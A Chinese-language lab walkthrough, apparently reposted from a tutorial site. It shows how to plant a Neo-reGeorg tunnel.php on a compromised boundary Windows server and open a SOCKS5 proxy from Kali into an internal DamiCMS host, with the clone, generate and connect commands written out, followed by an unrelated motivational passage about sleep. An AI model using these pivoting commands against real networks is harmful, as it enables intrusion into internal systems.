0x01 网络拓扑
假设:目前已获取边界服务器(192.168.0.103)的权限,远程管理服务器
实现:通过Neo-reGeorg,使得kali能够访问内网的192.168.93.40上的主机
0x02 背景介绍
| 主机 | 模式 | IP | 网站名称 | 备注 | |
|---|---|---|---|---|---|
| 边界服务器 | windows server 2016 | 桥接vmnet 4 | 192.168.0.103、192.168.93.129 | 文件管理系统 | 假设已经通过文件上传获取服务器权限,进行远程管理 |
| 二层网络 | windows 7 | vmnet 4 | 192.168.93.40 | 大米cms系统 |
0x03 代理配置
第一步 下载地址
https://github.com/L-codes/Neo-reGeorg/releases/tag/v3.8.1
https://github.com/L-codes/Neo-reGeorg
git clone https://github.com/L-codes/Neo-reGeorg.git
第二步 kali本地生成代理脚本
python3 neoreg.py generate -k 654321
第三步 上传到window server 2016服务器上(假设提前已经获取边界服务器权限)
第四步 本地kali 启动代理脚本,
http://192.168.0.103:8080/cms/admin/tunnel.php
python3 neoreg.py -k 654321 -u http://192.168.0.103:8080/cms/admin/tunnel.php
开启了本地的1080端口的socks5
0x04 测试连接
第一步 kali本地添加socks5配置
socks5 192.168.0.107 1080
第二步 访问 内网主机
第三步 使用burp代理获取数据包
firefox设置
burp设置上层socks5代理配置
获取数据包
http://192.168.93.40/dami_5.4/admin.php?s=/Public/login
第四步 进行文件上传(假设提前已经知道文件上传点)
进入后台
第五步 使用代理,开启远程连接工具
文章来源:https://www.toymoban.com/news/detail-475932.html
摘抄
有句话说得好:睡前放下一切,醒来便是新生。
无论前一天有多劳累,只要晚上及时休息,
保持充足的睡眠,精神就能得到恢复。第二天醒来拉开窗帘,让自己沐浴在清晨的阳光里,世界就又是全新而美好的样子。
我们不妨从现在起,为自己制定一张作息计划表,并按照计划坚持做下去。
相信不用多久,你就会发现:能规律生活的人,方可控制人生。
---------《作息规律》文章来源地址https://www.toymoban.com/news/detail-475932.html
到了这里,关于Neo-reGeorg通过socks5一层代理,访问内网系统-实战篇的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!
